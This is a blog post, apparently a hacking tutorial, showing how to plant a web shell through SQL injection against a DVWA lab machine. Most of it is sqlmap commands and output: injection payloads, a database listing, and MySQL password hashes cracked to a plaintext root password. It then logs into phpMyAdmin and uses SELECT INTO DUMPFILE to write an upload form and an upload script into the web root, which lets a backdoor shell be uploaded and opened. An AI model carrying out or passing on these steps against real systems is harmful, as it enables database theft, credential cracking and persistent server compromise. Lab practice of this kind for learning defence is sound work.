Create Backdoor with SQL (1)

Create backdoor from sql :
proof of concept
1. find vulnerabilities from website for sql injection
vulnerabilities on ttp://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1
2. test using sqlmap to know the backend database
–cookie because on dvwa have different securiry level from low, medium, and high.
i’m try to set dvwa use security level medium,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=’security=medium’ –dbs

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:51:35

[01:51:35] [INFO] using ‘/pentest/database/sqlmap/output/192.168.56.101/session’ as session file
[01:51:35] [INFO] resuming injection data from session file
[01:51:35] [INFO] resuming back-end DBMS ‘mysql 5.0’ from session file
[01:51:35] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ‘http://192.168.56.101:80/dvwa/login.php’. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1 AND (SELECT 3973 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,116,119,58),(SELECT (CASE WHEN (3973=3973) THEN 1 ELSE 0 END)),CHAR(58,114,116,99,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) &Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1 UNION ALL SELECT CONCAT(CHAR(58,108,116,119,58),IFNULL(CAST(CHAR(116,72,79,68,65,86,116,82,98,119) AS CHAR),CHAR(32)),CHAR(58,114,116,99,58)), NULL# &Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5) &Submit=Submit

[01:52:02] [INFO] manual usage of GET payloads requires url encoding
[01:52:02] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0
[01:52:02] [INFO] fetching database names
[01:52:02] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.56.101/session’: information_schema, cdcol, db_joomla, dvwa, mysql, phpmyadmin, test
available databases [7]:
[*] cdcol
[*] db_joomla
[*] dvwa
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test

[01:52:02] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/192.168.56.101′

[*] shutting down at: 01:52:02

3. then find mysql user and password to open shell-sql with sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=’security=medium’ –users –password

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:54:09

[01:54:10] [INFO] using ‘/pentest/database/sqlmap/output/192.168.56.101/session’ as session file
[01:54:10] [INFO] resuming injection data from session file
[01:54:10] [INFO] resuming back-end DBMS ‘mysql 5.0’ from session file
[01:54:10] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ‘http://192.168.56.101:80/dvwa/login.php’. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1 AND (SELECT 3973 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,116,119,58),(SELECT (CASE WHEN (3973=3973) THEN 1 ELSE 0 END)),CHAR(58,114,116,99,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) &Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1 UNION ALL SELECT CONCAT(CHAR(58,108,116,119,58),IFNULL(CAST(CHAR(116,72,79,68,65,86,116,82,98,119) AS CHAR),CHAR(32)),CHAR(58,114,116,99,58)), NULL# &Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5) &Submit=Submit

[01:55:27] [INFO] manual usage of GET payloads requires url encoding
[01:55:27] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0
[01:55:27] [INFO] fetching database users
[01:55:27] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.56.101/session’: ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’localhost’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘root’@’linux’, ‘pma’@’localhost’, ”@’localhost’, ”@’linux’
database management system users [5]:
[*] ”@’linux’
[*] ”@’localhost’
[*] ‘pma’@’localhost’
[*] ‘root’@’linux’
[*] ‘root’@’localhost’

[01:55:27] [INFO] fetching database users password hashes
[01:55:27] [INFO] read from file ‘/pentest/database/sqlmap/output/192.168.56.101/session’: root, *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19, root, , , , , , pma,
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[01:55:36] [INFO] using hash method: ‘mysql_passwd’
what’s the dictionary’s location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:55:37] [INFO] loading dictionary from: ‘/pentest/database/sqlmap/txt/wordlist.txt’
do you want to use common password suffixes? (slow!) [y/N] y
[01:55:40] [INFO] starting dictionary attack (mysql_passwd)
[01:55:42] [INFO] found: ‘password’ for user: ‘root’
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
clear-text password: password
password hash: NULL

[01:55:42] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/192.168.56.101′

[*] shutting down at: 01:55:42

4. on shell-sql we can create a backdoor
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=’security=medium’ –sql-shell

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 02:01:29

[02:01:29] [INFO] using ‘/pentest/database/sqlmap/output/192.168.56.101/session’ as session file
[02:01:29] [INFO] resuming injection data from session file
[02:01:29] [INFO] resuming back-end DBMS ‘mysql 5.0’ from session file
[02:01:29] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ‘http://192.168.56.101:80/dvwa/login.php’. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1 AND (SELECT 3973 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,116,119,58),(SELECT (CASE WHEN (3973=3973) THEN 1 ELSE 0 END)),CHAR(58,114,116,99,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) &Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1 UNION ALL SELECT CONCAT(CHAR(58,108,116,119,58),IFNULL(CAST(CHAR(116,72,79,68,65,86,116,82,98,119) AS CHAR),CHAR(32)),CHAR(58,114,116,99,58)), NULL# &Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5) &Submit=Submit

[02:01:50] [INFO] manual usage of GET payloads requires url encoding
[02:01:50] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0
[02:01:50] [INFO] calling MySQL shell. To quit type ‘x’ or ‘q’ and press ENTER
sql-shell>

sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[02:03:26] [INFO] fetching SQL SELECT statement query output: ‘show databases;’
[02:03:41] [WARNING] if the problem persists with ‘None’ values please try to use hidden switch –no-cast (fixing problems with some collation issues)
sql-shell>

until here i’m can’t to use syntax sql
ups… don’t worry… i try to different attack, after know the password mysql
i’m try to create backdoor via phpmyadmin.

lets try :
go to url : http://192.168.56.101/phpmyadmin
user : root
password : password

then click on menu SQL :
1. create database test_bd;
2. create table form(
gokil varchar(1000) not null)
engine=MYISAM

create table upload(
gokil2 varchar(1000) not null)
engine=MYISAM

find directory web app, from url : ttp://192.168.56.101/xampp/phpinfo.php
DOCUMENT_ROOT /opt/lampp/htdocs

3. then create way for backdoor
insert data to table form

insert data to table upload

dump to : /opt/lampp/htdocs
select * into dumpfile ‘/opt/lampp/htdocs/form.html’ from form
select * into dumpfile ‘/opt/lampp/htdocs/upload.php’ from upload

Finishing touch :
then upload your shell backdoor using form upload file in url :
http://192.168.56.101/form.html
upload :

and open your shell backdoor with url :
http://192.168.56.101/gokil.php

Advertisements

2 responses to “Create Backdoor with SQL (1)

  1. keren bro… tapi stepnya kepanjangan, gpp la keep share..
    salam peretas akakom, wkwk

  2. terima kasih… 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s